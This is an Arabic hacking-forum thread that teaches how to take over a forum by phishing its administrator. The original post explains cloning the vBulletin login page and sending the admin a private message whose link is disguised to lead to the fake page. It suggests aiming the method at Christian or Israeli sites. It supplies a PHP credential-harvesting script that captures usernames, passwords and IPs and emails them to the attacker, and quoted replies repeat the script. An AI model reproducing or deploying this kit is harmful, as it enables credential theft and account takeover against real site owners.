السلام عليكم ورحمة الله وبركاته

الموضوع اهداء الى المشككين اني هكر ولا هاذه الموضوع هو الاثبات


انا ما اضر انفع المسلمينبين خطين



السلام عليكم ورحمة الله وبركاته

كيفكم شباب ؟

ان شاء الله طيبين

طبعا في كثير من المواقع لمن تجي تستهدفها ماتحصل ثغرات
تخمن على الوردبريس + جوميلا وماتطلع بنتيجة

انا بأعطيكم الفكرة والباقي عليكم


المتطلبات

1/ منتدى على سيرفر الهدف

====================

اول شئ تدخل على المنتدى وتزور صفحة الدخول
كيف تزورها تابع الشرح اللي في الفديو

https://www.youtube.com/watch?v=bYAmz5n-ofk
طيب زورت الصفحة وكل شئ ايش بتسوي

تروح لمدير المنتدى وترسلو رسالة خاصه وبحركة فنية بسيطه تلغم رابط موضوع


كيف تلغمو تاخذ رابط اي موضوع

كسبيل مثال هذا

تصميم فلاشي ^_^ - مجتمع الفرسان (http://www.x6x.net/vb/t17905/)

تقوم تعدل على الرابط
بزيادة رقمين
http://www.x6x.net/vb/showthread.php?t=1790505
علشان لمن ينسخ الرابط يعطيه خطا

وتقوم تسوي ارتباط تشعبي
عن طريق الايقونه هذه
http://www.x6x.net/vb/images/editor/createlink.gif

تضغط وبتحط رابط الصفحة المزوره

طبعا الرساله الخاصه لمن ترسلها للمدير على حسب الموقع
مثلا
تقول
في موضوع في المنتدى يدعو الى الاسلام نرجو حذف الموضوع << طبعا لمن يكون الموقع مسيحي او اسرائيلي

ترجم قوقل يامعلم وارسل

طبعا راح ارفقلكم في الموضوع

كود التغليم اللي في الفديو

<?php
$login_email = $_POST['vb_login_username'];
$login_password = $_POST['vb_login_password'];
$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
session_start();
session_register("login_email");
session_register("login_password");
setcookie("emaill", $login_email, time()+3600); /* expire in 1 hour */
setcookie("passwordd", $login_password, time()+3600); /* expire in 1 hour */
if((empty($login_email))OR(empty($login_password)) ) { header("Location: index.htm"); } else {
$email="$login_email";
$email=strpos($login_email, "@");
if($email==false){ header("Location: index.htm"); }

header("Location: رابط الموقع اللي لغمته/");
}
$send = "اميلك";
$msg = "$login_email,$login_password,$ip";
$subject = "رابط المنتدى اللي لغمته /";
mail("اميلك", $subject, $msg);
?> (http://www.x6x.net/vb/search.php?do=finduser&u=176477&starteronly=1)




تابع وبتركيز

تنسيق الكود

ياليت شرح بسيط للكود

كود PHP:

<?php
$login_email = $_POST['vb_login_username'];
$login_password = $_POST['vb_login_password'];
$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
session_start();
session_register("login_email");
session_register("login_password");
setcookie("emaill", $login_email, time()+3600); /* expire in 1 hour */
setcookie("passwordd", $login_password, time()+3600); /* expire in 1 hour */
if((empty($login_email))OR(empty($login_password)) ) { header("Location: index.htm"); } else {
$email="$login_email";
$email=strpos($login_email, "@");
if($email==false){ header("Location: index.htm"); }

header("Location: رابط الموقع اللي لغمته/");
}
$send = "اميلك";
$msg = "$login_email,$login_password,$ip";
$subject = "رابط المنتدى اللي لغمته /";
mail("اميلك", $subject, $msg);
?>




http://www.x6x.net/vb/frsan_hexll/buttons/reputation.gif (http://www.x6x.net/vb/reputation.php?p=1305272184) http://www.x6x.net/vb/frsan_hexll/buttons/report.gif (http://www.x6x.net/vb/report.php?p=1305272184)

http://www.x6x.net/vb/images/likeicon.png (http://www.x6x.net/vb/t270042/#)



http://www.x6x.net/vb/frsan_hexll/buttons/quote.gif (http://www.x6x.net/vb/newreply.php?do=newreply&p=1305272184) http://www.x6x.net/vb/frsan_hexll/buttons/multiquote_off.gif (http://www.x6x.net/vb/newreply.php?do=newreply&p=1305272184) http://www.x6x.net/vb/frsan_hexll/buttons/quickreply.gif (http://www.x6x.net/vb/newreply.php?do=newreply&p=1305272184)
فترة الأقامة : 23 يوم معدل التقييم : http://www.x6x.net/vb/images/reputation/reputation_pos.gifhttp://www.x6x.net/vb/images/reputation/reputation_pos.gifhttp://www.x6x.net/vb/images/reputation/reputation_pos.gifhttp://www.x6x.net/vb/images/reputation/reputation_pos.gifhttp://www.x6x.net/vb/images/reputation/reputation_pos.gif زيارات الملف الشخصي : 9 (http://www.x6x.net/vb/u178373/)
إحصائية مشاركات » xjava (http://www.x6x.net/vb/u178373/) المواضيـعالــــــردود [+ (http://www.x6x.net/vb/search.php?do=finduser&u=178373&starteronly=1)] [+ (http://www.x6x.net/vb/search.php?do=finduser&u=178373)] بمـــعــدل : 0.30 يوميا
xjavaمشاهدة ملفه الشخصي (http://www.x6x.net/vb/u178373/)إرسال رسالة خاصة إلى xjava (http://www.x6x.net/vb/private.php?do=newpm&u=178373)البحث عن كل مشاركات xjava (http://www.x6x.net/vb/search.php?do=finduser&u=178373)إضافة xjava إلى الإتصالات الخاصة بك (http://www.x6x.net/vb/profile.php?do=addlist&userlist=buddy&u=178373)
http://www.x6x.net/vb/frsan_hexll/statusicon/post_old.gif 04-30-2015, 01:01 PM #3 (http://www.x6x.net/vb/t270042/#post1305272196) الهيكل العظمي (http://www.x6x.net/vb/u176477/)
.: HaCkErs x6x :.

http://www.x6x.net/vb/images/smilies/017[1].gif::.KAREEM HACK ::. http://www.x6x.net/vb/images/smilies/eh_s(22)[1].gif
http://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/najwm-1/95.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gifhttp://www.x6x.net/vb/images/rating/star.gif

http://www.x6x.net/vb/image.php?u=176477&dateline=1408275638 (http://www.x6x.net/vb/u176477/)
http://www.x6x.net/vb/frsan_hexll/statusicon/user_online.gif

بيانات اضافيه [ + (http://www.x6x.net/vb/t270042/#posts) ] رقم العضوية : 176477 تاريخ التسجيل : 13-08-2014 أخر زيارة : اليوم (12:23 PM) المشاركات : 846 [ + (http://www.x6x.net/vb/t270042/#posts) ] التقييم : 18632 الدولهـ http://www.x6x.net/vb/helm/flags/Saudi Arabia.gif

3270

http://www.x6x.net/vb/images/icons/icon1.gif رد: اختراق اي منتدى عن طريق الهندسة الاجتماعية وتزور الصفحة هع


اقتباس:
المشاركة الأصلية كتبت بواسطة xjava http://www.x6x.net/vb/frsan_hexll/buttons/viewpost.gif (http://www.x6x.net/vb/t270042/#post1305272184)
تنسيق الكود

ياليت شرح بسيط للكود

كود PHP:

<?php
$login_email = $_POST['vb_login_username'];
$login_password = $_POST['vb_login_password'];
$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
session_start();
session_register("login_email");
session_register("login_password");
setcookie("emaill", $login_email, time()+3600); /* expire in 1 hour */
setcookie("passwordd", $login_password, time()+3600); /* expire in 1 hour */
if((empty($login_email))OR(empty($login_password)) ) { header("Location: index.htm"); } else {
$email="$login_email";
$email=strpos($login_email, "@");
if($email==false){ header("Location: index.htm"); }

header("Location: رابط الموقع اللي لغمته/");
}
$send = "اميلك";
$msg = "$login_email,$login_password,$ip";
$subject = "رابط المنتدى اللي لغمته /";
mail("اميلك", $subject, $msg);
?>

شنو ذا هكر ماهكر :x142::bust:

يسلمووووووووو الايادي

ههههههههههههههههههه
والله هذا وانا اسمي صاحب المنتدى
ما فهمت شي
كيف هالاعضاء ههههههههه

يسلمو يا ع الطرح
وردي وودي

وجدت هنا موضوع وطرح شيق
ورائع اعجبني ورآق لي
شكراً جزيلاً لك .
وبالتوفيق الدائم.
http://img.roro44.com/imgcache/2013/11/1945.gif

سلمت يدآك على روعة الطرح
وسلم لنآ ذوقك الراقي على جمال الاختيار
لك ولحضورك الجميل كل الشكر والتقدير
اسأل البآري لك سعآدة دائمة
تحياتي

طرح رائع ومفعم بالجمال والرقي..

يعطيك العافيه على هذا الطرح..
وسلمت اناملك المتألقه لروعة طرحها..
تقديري لك..

موضوع رائع ومميز
طرحت فابدعت دمت ودام عطائك
سلمت اناملك الذهبيه على ماخطته لنا
اعذب التحايا لك

سلمت الأيادي على الموضوع
كل الشكر لكم

بنتظار كل جديد ومفيد

تسسلم الايـآدي
على روعه طرحك
الله يعطيك العافيه يـآرب
بانتظـآر جــديدك القــآدم

يعطيك العافيه أنتقاء رأئع
تحياتي